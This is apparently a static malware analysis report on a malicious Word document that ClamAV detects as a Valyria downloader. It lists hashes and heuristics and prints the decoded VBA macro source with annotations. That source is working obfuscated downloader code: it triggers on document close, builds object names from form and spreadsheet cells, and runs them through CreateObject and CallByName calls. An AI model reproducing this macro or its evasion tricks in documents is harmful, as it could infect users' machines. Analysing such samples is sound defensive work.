Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 0dae85d177f34e18…

MALICIOUS

Office (OOXML)

Size: 82.3 KB
Created: 2021-01-29 12:36:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2021-02-09
MD5: 94c3df70fd6bab66ddb887135cce5653
SHA-1: 877178d56cdbdbb161853d1dbae76f0feea16d46
SHA-256: 0dae85d177f34e18d28e33d6ae47f0e49b49796d9cf32fec028fd733a54f639d
Risk score: 222

Heuristics (5)

  • ClamAV: Doc.Downloader.Valyria-10033915-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Valyria-10033915-0
  • VBA project inside OOXML [medium, 2 related findings] OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    Matched line in script:
    Set ep = CreateObject(UserForm1.at & UserForm1.v2)
  • CallByName call [high] OLE_VBA_CALLBYNAME
    Matched line in script:
    Set ic = CallByName(ep.Workbooks, UserForm1.fm & UserForm1.g5, 1, UserForm2.ComboBox1, , , , UserForm1.rf)
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 6926 bytes
SHA-256: bdcaf6d799450d6569f47039b93f26896747a9c79cf87c255f639ff35a3a633b
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True


Public om, eb, ek, dn, rb, ep, i5, pf, u, ysv, lz, pw, mz, kh, pq, cw

' Entry point: Document_Close fires when the document is closed, not when it is opened.
Sub Document_Close()
    bp
End Sub

Sub bp()
    ' All runtime errors are suppressed for the rest of the procedure.
    On Error Resume Next
    ' Selects item index 5 of UserForm2.ComboBox1, the string assembled in UserForm2.UserForm_Initialize (see that module below).
    UserForm2.ComboBox1.ListIndex = 5
    ' The ProgID is split across two UserForm1 control values. The object is then used as an automation host
    ' exposing .DisplayAlerts, .Workbooks and .sheets (consistent with Excel; inferred from the members used, not confirmed).
    Set ep = CreateObject(UserForm1.at & UserForm1.v2)
    ep.DisplayAlerts = False
    ' Reads such as rq = UserForm2.ComboBox19 assign to variables that are never used again: junk statements interleaved with the real logic.
    rq = UserForm2.ComboBox19
    ydm = 1301
    ck = 0
    Err.Number = 0
    qf = UserForm2.ComboBox26
    ' Retries a method on ep.Workbooks (name split across UserForm1.fm and .g5; CallType 1 = VbMethod) with the selected
    ' ComboBox1 string as first argument until Err.Number is 0 or ck reaches 32 (at most two iterations).
    While ydm <> 0 And ck < 32
        Set ic = CallByName(ep.Workbooks, UserForm1.fm & UserForm1.g5, 1, UserForm2.ComboBox1, , , , UserForm1.rf)
        ydm = Err.Number
        ck = ck + 16
    Wend
    ' Fallback when the call above kept failing (also reached through GoTo ErrHandler further down).
    If ydm <> 0 Then
ErrHandler:
        x9j = CallByName(Application, UserForm1.na & UserForm1.o1, 2)   ' CallType 2 = VbGet
        If x9j <> False Then
            qs = UserForm2.ComboBox27
            Set j0 = CreateObject(UserForm1.s0v & UserForm1.jo)
            CallByName j0.Documents, UserForm1.fm & UserForm1.g5, 1, ActiveDocument.FullName, , True
            ' Passes Now + 2 s and the procedure name "bp" to j0: a delayed re-entry into bp (OnTime-style scheduling, inferred).
            CallByName j0, UserForm1.dx & UserForm1.zx, 1, Now + TimeSerial(0, 0, 2), UserForm1.dr & UserForm1.l2 & "bp"
            ib = UserForm2.ComboBox15
        Else
            ' Same delayed re-entry, 17 s later, through the current Application object.
            CallByName Application, UserForm1.dx & UserForm1.zx, 1, Now + TimeSerial(0, 0, 17), UserForm1.dr & UserForm1.l2 & "bp"
            qq = UserForm2.ComboBox15
        End If
        ep.Quit
        Exit Sub
    End If
    Dim ov
    Set ov = ep.sheets(1)
    lr = "'"
    ' Check on the opened workbook: sheet 5 cell A1 must be non-empty, otherwise the workbook title must be "Google".
    cw = ep.sheets(5).Cells(1, 1)
    If Len(cw) < 1 Then
        If ep.ActiveWorkbook.Title <> "Google" Then
            GoTo ErrHandler
        Else
            Exit Sub
            qh = UserForm2.ComboBox7   ' unreachable
        End If
    End If
    ' Strings used below (ProgIDs, member names, arguments) are read from workbook cells rather than stored in the macro.
    qu = ov.Cells(78, 24).Value
    l4 = ov.Cells(7, 14).Value
    ysv = ov.Cells(8, 33).Value
    lz = ep.sheets(2).Cells(142, 2).Value
    rb = ep.sheets(2).Cells(80, 49).Value
    v7b = ep.sheets(2).Cells(142, 60).Value
    da = ov.Cells(81, 8).Value
    dk = UserForm2.ComboBox11
    k9 = ep.sheets(3).Cells(52, 45).Value
    el = ep.sheets(2).Cells(50, 18).Value
    d0 = ep.sheets(1).Cells(29, 52).Value
    td = UserForm2.ComboBox7
    mz = ep.sheets(2).Cells(73, 8).Value
    i5 = ov.Cells(5, 36).Value
    u = ep.sheets(3).Cells(87, 42).Value
    ih = UserForm2.ComboBox12
    iin = ep.sheets(3).Cells(31, 12).Value
    b1 = ep.sheets(2).Cells(44, 36).Value
    pw = ov.Cells(53, 50).Value
    ag = ep.sheets(1).Cells(149, 47).Value
    r1 = ep.sheets(2).Cells(145, 35).Value
    om = ep.sheets(3).Cells(131, 27).Value
    mj = UserForm2.ComboBox9
    ns = ep.sheets(3).Cells(69, 40).Value
    r4 = UserForm2.ComboBox12
    j4 = ep.sheets(1).Cells(116, 32).Value
    pf = ep.sheets(3).Cells(22, 10).Value
    eb = ep.sheets(3).Cells(138, 35).Value
    et = ep.sheets(3).Cells(56, 26).Value
    nj = ep.sheets(2).Cells(63, 33).Value
    pq = ""
    ' Concatenates column A of sheet 4 into pq until the first empty cell.
    Set Sh1 = ep.sheets(4)
    du = 1
    fk = UserForm2.ComboBox9
    ot = True
    While ot
        eg = Sh1.Cells(du, 1).Value
        If Len(eg) < 1 Then
            ot = False
        Else
            pq = pq & eg
        End If
        du = du + 1
    Wend
    ris = CallByName(ep, d0, 2)
    UserForm1.d9.Value = da & ris & r1
    ro = UserForm2.ComboBox15
    UserForm1.ab.Value = l4
    xi8 = UserForm2.ComboBox20
    ' Creates an object whose ProgID came from a cell (nj) and invokes member j4 on it with three arguments.
    CallByName CreateObject(nj), j4, 1, UserForm1.d9, ag, UserForm1.ab
    Set v8 = CreateObject(qu)
    g8 = UserForm2.ComboBox6
    Set ku = CallByName(v8, v7b, 2)
    h8 = UserForm2.ComboBox20
    Set vo = CallByName(ku, et, 1)
    Set u = CallByName(v8, u, 2)
    Set dn = v8
    ' The first reference to UserForm5, UserForm3 and UserForm4 loads each form and fires its UserForm_Initialize,
    ' which performs further CallByName calls on the public variables set above (see the form modules below).
    UserForm5.ComboBox1 = "mw"
    Set om = CallByName(kh, om, 2)
    pf = CallByName(om, pf, 2)
    UserForm1.iy.Value = ns & k9
    UserForm3.ComboBox1 = el
    vu = UserForm2.ComboBox15
    UserForm1.iy.Value = iin
    fx = UserForm2.ComboBox4
    UserForm4.ComboBox1 = UserForm3.ComboBox1
    UserForm3.ComboBox1 = pf
    ' Assignments from never-defined names (kv, i9, ...): filler that evaluates to Empty; any errors are swallowed by On Error Resume Next.
    v8 = kv
    dv = UserForm2.ComboBox6
    ic = i9
    eo = UserForm2.ComboBox16
    ov = ie
    ku = go
    vo = kr
    u = gd
    ysv = ly
    lz = kc
    kh = m5r
    om = aq
    dn = ct
    DoEvents
    CallByName ep, b1, 1
    ep = g4
End Sub

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{83B86C37-8283-40E9-903B-7C14AF8652BB}{05C5F207-1DF7-41EE-B0C4-323134FC4640}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{32A4A80D-1638-45FF-9C38-C7E873ADB834}{77C707F6-A55D-4D2C-9151-22F8CD607BC4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
    ym4 = UserForm2.ComboBox7
    g0 = UserForm2.Controls.Count - 1
    h1 = UserForm2.ComboBox4
    ' Concatenates the default property of every second control of UserForm2 (Item(1), Item(3), ...) into au.
    au = ""
    For ig = 1 To g0 Step 2
        au = au & UserForm2.Controls.Item(ig)
    Next
    ' au becomes item index 5 of ComboBox1, which bp selects (ListIndex = 5) and passes to the Workbooks call.
    ComboBox1.AddItem "f8"
    ComboBox1.AddItem "zg"
    ComboBox1.AddItem "ei"
    ComboBox1.AddItem "ed"
    ComboBox1.AddItem "i3"
    ComboBox1.AddItem au
    ComboBox1.AddItem "gz"
    f5 = UserForm2.ComboBox18
End Sub


Attribute VB_Name = "UserForm3"
Attribute VB_Base = "0{7D752832-5ED9-4F91-A7EC-1E463377426B}{F5288B81-00F2-4D75-BE4A-085AF8167D88}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

' Each form's UserForm_Initialize is an indirect call site: bp loads the form by touching a control,
' and the event handler then invokes members of the objects held in ThisDocument's public variables.
Private Sub UserForm_Initialize()
    CallByName ActiveDocument.om, ActiveDocument.i5, VbMethod, 1, ActiveDocument.pf
    CallByName ActiveDocument.om, ActiveDocument.eb, VbMethod, UserForm1.iy.Value
End Sub

Attribute VB_Name = "UserForm4"
Attribute VB_Base = "0{217A3628-D901-4E41-8B58-B223A6080933}{9EB52867-F2D1-4F68-A4B2-59B57F58FC9B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
    CallByName ActiveDocument.dn, ActiveDocument.rb, VbMethod, UserForm1.iy.Value, ActiveDocument.pq, ActiveDocument.cw
End Sub

Attribute VB_Name = "UserForm5"
Attribute VB_Base = "0{5E673E03-02C2-4882-B433-0657DBBED600}{2A10DA8D-51F4-4F22-98AB-9EEAEC21B4CD}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Private Sub UserForm_Initialize()
    ' Property-get chain (VbGet) through the objects created in bp, ending in a method call with mz as argument.
    Set ActiveDocument.ysv = CallByName(ActiveDocument.u, ActiveDocument.ysv, VbGet)
    Set ActiveDocument.lz = CallByName(ActiveDocument.ysv, ActiveDocument.lz, VbGet)
    Set ActiveDocument.kh = CallByName(ActiveDocument.lz, ActiveDocument.pw, VbMethod, ActiveDocument.mz)
End Sub
vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 50688 bytes
SHA-256: 7db12c1f59d1673b48709aa10f3afec8e8fa62fb682fa8be4eeaa075985d636b
Detection
ClamAV: Doc.Downloader.Valyria-10033915-0
Obfuscation or payload: unlikely